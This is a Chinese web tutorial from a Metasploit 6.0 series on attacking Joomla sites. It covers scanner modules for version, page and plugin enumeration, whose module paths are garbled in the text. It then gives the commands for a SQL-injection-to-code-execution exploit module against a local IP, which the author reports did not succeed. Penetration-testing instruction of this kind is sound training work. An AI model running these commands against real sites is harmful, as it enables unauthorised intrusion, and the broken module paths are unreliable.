Skip to main content
 Web开发网 » 站长学院 » 浏览器插件

Metasploit6.0系列教程 -- 渗透Joomla网站

2021年11月02日6430百度已收录

一、使用Metasploit对Joomal进行侦察

1、探测版本信息

选择joomla_version辅助模块,设置端口号及IP地址,run运行

use auxiliary/scanner/Metasploit6.0系列教程 -- 渗透Joomla网站  Joomla 第1张

2、页面枚举

选择Joomla_pages辅助模块,设置端口号及IP地址,run运行

use auxiliary/scanner/Metasploit6.0系列教程 -- 渗透Joomla网站  Joomla 第2张

3、插件枚举

选择Joomla_plugins辅助模块,设置端口号及IP地址,run运行

use auxiliary/scanner/Metasploit6.0系列教程 -- 渗透Joomla网站  Joomla 第3张

二、使用Metasploit对Joomla进行漏洞利用

1、use unix/webapp/joomla_comfields_sqli_rce2、set rhosts 192.168.1.1113、set rport 80804、runMetasploit6.0系列教程 -- 渗透Joomla网站  Joomla 第4张

5、因为利用模块会报错,所以需要修改一下,但是最后还是没有利用成功,获取cookie的时候可能出问题了,大家有兴趣的可以继续修改一下。

Metasploit6.0系列教程 -- 渗透Joomla网站  Joomla 第5张

该系列教程内容参考自华章IT出版的

《Web渗透测试实战:基于Metasploit 5.0》

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

Metasploit6.0系列教程 -- 渗透Joomla网站  Joomla 第6张

Metasploit6.0系列教程 -- 渗透Joomla网站  Joomla 第7张

Metasploit6.0系列教程 -- 渗透Joomla网站  Joomla 第8张

评论列表暂无评论
发表评论
微信